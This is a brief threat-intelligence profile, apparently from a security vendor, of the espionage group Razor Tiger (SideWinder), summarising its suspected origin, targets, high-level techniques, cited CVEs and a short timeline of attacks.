Threat Actor Profile

Razor Tiger

Razor Tiger, also known as SideWinder, APT-C-17, and Rattlesnake, is a nation-state-sponsored threat actor active since at least 2012. Believed to operate from India, the group specializes in cyber-espionage targeting military, government, and maritime sectors. Razor Tiger employs spear-phishing, fileless malware, and advanced infrastructure to achieve its objectives.

Threat Actor Profile

Razor Tiger

Country of Origin

Razor Tiger is strongly suspected to originate from India, based on linguistic, operational, and geopolitical indicators. However, definitive attribution remains challenging.

Members

The exact size and composition of Razor Tiger are unclear. The group is believed to operate as a tightly-knit unit with access to significant resources, suggesting state sponsorship.

Leadership

The leadership of Razor Tiger remains unknown.

Razor Tiger TTPs

Tactics

The group focuses on intelligence gathering, targeting national defense, diplomatic, and critical infrastructure sectors.

Techniques

Razor Tiger leverages spear-phishing emails, malicious Office documents, and fileless malware to infiltrate targets. Exploited vulnerabilities include CVE-2017-11882 and CVE-2017-0199.

Procedures

The group uses multi-stage loaders, obfuscated JavaScript, and modular implants like StealerBot and WarHawk. Command-and-control (C2) infrastructure includes over 400 domains and dynamic subdomains.

Want to Shut Down Threats Before They Start?

Schedule a Demo Today

Notable Cyberattacks

2013: Phishing attack on the Indian Embassy in Kabul, leading to data exfiltration.
2024: Targeted maritime facilities in the Mediterranean using geofenced payloads.
2025: Breach of Pakistan's Cabinet Division with kernel-level malware.